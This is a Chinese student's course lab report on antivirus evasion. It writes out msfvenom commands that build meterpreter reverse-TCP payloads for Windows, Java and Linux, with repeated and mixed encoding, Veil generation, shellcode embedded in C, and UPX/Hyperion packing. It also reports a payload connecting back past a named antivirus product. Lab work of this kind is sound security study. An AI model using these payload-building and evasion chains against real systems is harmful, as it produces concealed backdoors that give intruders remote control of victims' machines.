首页 > 其他分享 >20222415 2024-2025-1 《网络与系统攻防技术》实验三实验报告

20222415 2024-2025-1 《网络与系统攻防技术》实验三实验报告

时间:2024-10-31 20:32:51浏览次数:6  
标签:LPORT exe x86 LHOST tcp 2024 2025 20222415 msfvenom

1.实验内容

学习了恶意代码和恶意代码的分析,并介绍了信息搜集技术和怎样进行信息搜集。

2.实验过程

1.1 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
(1)使用msf生成可执行文件并检测
生成payload并检测
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.154.122 LPORT=8110 -f exe > 20222415_msf_encode_0.exe


进行编码:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.154.122 LPORT=8110 -f exe > 20222415_msf_encode_1.exe


多次编码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.154.122 LPORT=8110 -f exe > 20222415_msf_encode_10.exe


混合编码:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 3 -b '\x00' LHOST=192.168.154.122 LPORT=8110 -f raw | msfvenom -a x86 --platform windows -e x86/xor_dynamic -i 5 -b '\x00' -f exe > 20222415_msf_encode_mix.exe


选择一个适用于Java环境的payload来生成jar文件
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.154.122 LPORT=8110 -f jar > 20222415_msf_jar.jar
使用编码器对payload进行编码
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.154.122 LPORT=8110 - e x86/shikata_ga_nai -i 10 -f jar > 20222415_msf_jar_encode.jar



生成一个反向 TCP 连接的 Linux elf 可执行文件
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.154.122 LPORT=8110 -f elf > 20222415_msf_elf.elf
使用编码器对payload进行编码
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.154.122 LPORT=8110 -e x86/shikata_ga_nai -i 10 -f elf > 20222415_msf_elf_encode.elf


(2)使用veil
安装veil
这里由于我安装veil的过程太过于曲折,反复尝试,多方求索,用尽了所有的力气和手段,所有最以虽然安装好了,但是我也不清楚我做对了什么又做错了什么,因此veil安装过程在这里省略。
贴一张快成功之前的截图

输入veil启动,再输入use evasion进入evasion
输入list查看payload类型

我们要使用的是7)c/meterpretermrev_tcp.py,所以输入use 7选择payload
输入set LHOST 172.16.227.205设置反弹链接ip
set LPORT 8888设置端口
generate生成
在Please enter the base name for outpot files(default is payload):后输入想取的文件名veil_trq2415


使用VirusTotal对生成的文件进行检测

(3)使用C + shellcode编程
输入命令msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.227.205 LPORT=8888 -f c生成shellcode

将shellcode写入c程序中

进行静态编译

使用VirusTotal进行检测

(4)加壳
upx加壳:输入upx shellcode2415.exe -o shellcode2415_upx.exe

hyperion加壳:输入cp shellcode2415.exe /usr/share/windows-resources/hyperion
输入cd /usr/share/windows-resources/hyperion进入文件夹,输入ls查看生成的可执行文件;
输入wine hyperion.exe -v shellcode2415.exe shellcode_hyperion_2415.exe

使用VirusTotal进行检测


2.2通过组合应用各种技术实现恶意代码免杀
(1)第一次我尝试了组合技术:msfvenom生成Shellcode数组,将shellcode分散到数个数组中储存,将数组按序输入文件,使用另一个数组读取文件内容即shellcode。

很明显没成功。
(2)第二次采用了shellcode+两次编码+c语言半手工编程的方法
`msfvenom -p windows/meterpreter/reverse_tcp -b '\x00' -e x86/shikata_ga_nai LHOST=172.16.22.205 LPORT=2422 -f raw | msfvenom -a x86 --platform windows -b '\x00' -e x86/bloxor -f c > shellzuhe2.c


又失败了。
(3)不知道怎么就实现的一次(win11 联想电脑管家)
在进行回连后,使用(2)生成的文件莫名其妙实现免杀了
在我完成回连后再次进行检测,发现我的杀毒软件检测不出来这个程序了,为了避免是我无意间让我的杀软忽视了这个程序,我再次编译重新生成了可执行文件shellcodeceshi.exe放主机上,没检测出来(截图已经手动查杀了)

又又为了避免是因为我之前忽视过shellcodezuhe.exe,导致同一个c文件编译出来的程序也被杀软放过,所以我把shellcodezuhe.exe从信任区和隔离区里移除后再次查杀,真没杀出来。

2.3用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
由于实在是没实现免杀,所以为了完成这步,我只能让杀毒软件饶了我的程序,进行连接,连接步骤基本和实验二相同,只是在主机上运行的是本次实验生成的程序shellcodezuhe.exe,也是成功连接上了

3.问题及解决方案

4.学习感悟、思考等

本次实验比前几次实验都要痛苦很多,最主要的就是veil的安装,这步不是最难的,但是是最折磨人的,但是我最后还是凭借我的毅力感动了机魂。本次实验最主要的是最后组合实现免杀,进行了几种尝试,也和同学进行过几次沟通,都没有实现,但是最后的程序又确实表现出了免杀,我目前还是没分析明白。本次实验充分展现了我使不完的牛劲,也暴露出我千疮百孔的知识面,我会在之后继续进行学习,弥补我的不足。

标签:LPORT,exe,x86,LHOST,tcp,2024,2025,20222415,msfvenom
From: https://www.cnblogs.com/2415trq/p/18518826

相关文章

  • CSP2024游记
    0.前言我死了……等等,我没死?(惊觉)魁雯(Kiw_的中文通用网名)只打了CSP-S,因为我高一没法打J组qwq一开始没打算写游记……因为觉得CSP-S大概率会把我送退役,结果打完之后发现情况还好(高一这届虽然也都能碾压我但起码我能拿到NOIP的奖,之后再说之后的事)所以还是动笔写写吧,毕竟我可不敢......
  • 多校 A 层冲刺 NOIP2024 模拟赛 16
    多校A层冲刺NOIP2024模拟赛16T1四舍五入签到题注意到一个数是否会入上去只和其剩余系有关,即满足\(i\modj<\frac{1}{2}j\),会入上去,考虑枚举j的倍数,其贡献就成了一个区间,差分即可。时间复杂度是调和级数的,为\(O(n\lnn)\)。T2填算符贪心,特殊性质显然将所有\(\&\)放......
  • # 20222316 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    一、实验内容1.学习总结1)免杀基本概念英文为Anti-AntiVirus(简写VirusAV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。2)免杀技术修改特征码修改校验和花指令免杀花指令其实......
  • NOIP2024集训Day65 贪心
    NOIP2024集训Day65贪心A.[NOI2015]荷马史诗简化题意,即构造一颗\(k\)叉树,每个节点的权值为其所有孩子的权值之和,给定的\(n\)个数必须使用,其余空缺处用\(0\)补全。考虑使用优先队列,首先弹入\(n+(n-1)\%(k-1)\)个元素(不足处用0代替),然后每次弹出前\(k\)小的数......
  • NOIP 模拟赛:2024-10-30
    T1:一场比赛一共有\(n\)位选手和\(m\)道题目,其中你是第\(1\)位选手。你现在知道了每位选手通过了哪些题目。你可以调整题目的顺序,然后给题目赋予一个分值,使得第\(i\)道题目的分值是\(2^i\)。你想知道能否通过调整题目的顺序,使得你的成绩恰好是第二高的。保证不存在两个选手的通......
  • Goby 漏洞发布|Apache Solr /solr/admin/info/properties:/admin/info/key 权限绕过漏
    漏洞名称:ApacheSolr/solr/admin/info/properties:/admin/info/key权限绕过漏洞(CVE-2024-45216)EnglishName:ApacheSolr/solr/admin/info/properties:/admin/info/keyPermissionBypassVulnerability(CVE-2024-45216)CVSScore:7.3漏洞描述:ApacheSolr是一个开源搜索服......
  • 探索自然之美,畅享户外精彩—2025北京国际户外用品展览会|户外露营装备展
    探索自然之美,畅享户外精彩—2025北京国际户外用品展览会|户外露营装备展 在繁华的都市生活中,人们渴望回归自然,寻找内心的宁静与自由。户外露营,作为一种亲近大自然的生活方式,正越来越受到人们的喜爱。而2025北京国际户外用品展览会户外露营装备展,将为您带来一场前所未有的户外......
  • 2024.10.31模拟赛
    一定要好好睡觉啊,不然打模拟赛的时候会困死的!!!非常非常困的7:50时就开始打模拟赛,还是打了四个小时。打了T1、T2的正解,T3的5分特殊样例、T3的10分特殊样例,预计总215分。然后经过漫长的三个小时的等待,出现了T1100分,T265分,T360分,T410分、总分235分的神奇成绩。虽然结果比预......
  • 『模拟赛』多校A层冲刺NOIP2024模拟赛16
    Rank依托,给我烂完了(A.四舍五入唐题,赛时被硬控3h。发现枚举\(i\)是一个很没前途的选择,分成三段后仍然需要\(\mathcal{O(n)}\)去跑\(\left[1,\lfloor{\frac{i}{2}}\rfloor\right]\)这一段,复杂度仍是\(\mathcal{O(n^2)}\)的,只有30pts。正难则反,我们换个角度考虑枚......
  • AUMO 傲目亮相 2024 汽车工程技术与装备展,多款自动驾驶硬件在环仿真测试产品引关注
     10月29日至31日,由工业和信息化部装备工业发展中心、中国检验认证集团和长三角国家技术创新中心主办的“2024汽车工程技术与装备展”在苏州高新区狮山会议中心成功举办。 本次展会以“新智驱动、新质发展”为主题,设立了多场主题分论坛和特色活动,汇聚了来自全国各地的行业领......